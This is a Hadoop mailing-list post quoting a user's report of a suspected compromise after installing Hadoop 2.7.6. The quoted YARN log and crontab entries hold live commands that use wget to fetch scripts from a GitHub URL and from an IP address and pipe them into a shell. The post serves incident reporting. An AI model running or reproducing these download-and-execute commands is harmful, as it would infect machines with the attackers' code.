For folks on this list, please see the response I sent when this message came in on the yarn-dev@hadoop mailing list:
https://s.apache.org/nO7O On Fri, Jun 29, 2018 at 7:46 AM, Cliff Mattern <clifford.matt...@alphacarina.de> wrote: > Dear all, > > we downloaded > http://www.apache.org/dyn/closer.cgi/hadoop/common/hadoop-2.7.6/hadoop-2.7.6.tar.gz > and install the unpacked files as described. The md5 check was correct. > After few days we found in the log files of YARN following entries: > > 2018-06-29 05:37:21,490 INFO > org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Command > to launch container container_1530169168373_1580_01_000001 : wget -q -O - > https://raw.githubusercontent.com/zzgamond1/mygit/master/zz.sh | bash > ... > 2018-06-29 05:39:54,152 INFO > org.apache.hadoop.yarn.server.resourcemanager.amlauncher.AMLauncher: Command > to launch container container_1530169168373_1583_01_000001 : wget -q -O - > https://raw.githubusercontent.com/zzgamond1/mygit/master/zz.sh | bash & > disown > > In the crontab we found following single entry: > * * * * * wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&1 > > We installed hadoop 2.7.6 on two seperate machines and get the same > behaviour. This all looks like a trojaner is working. What do you say to > this issue? > > Mit freundlichen Grüßen / Kind regards, > Cliff Mattern > > -- > Clifford Mattern > AlphaCarina Software GmbH > Taunusturm 18.OG > Taunustor 1 > 60310 Frankfurt am Main > > Tel.: +49 (0)69 24 43 42-4395 > Fax: +49 (0)69 24 43 42-4150 > > e-Mail: clifford.matt...@alphacarina.de > Internet: https://alphacarina.de/ > > HRB Nr. 2339 • Handelsregister Deggendorf > Geschäftsführer: Dipl.-Inf. Stephan Iglhaut -- busbey --------------------------------------------------------------------- To unsubscribe, e-mail: user-unsubscr...@hadoop.apache.org For additional commands, e-mail: user-h...@hadoop.apache.org
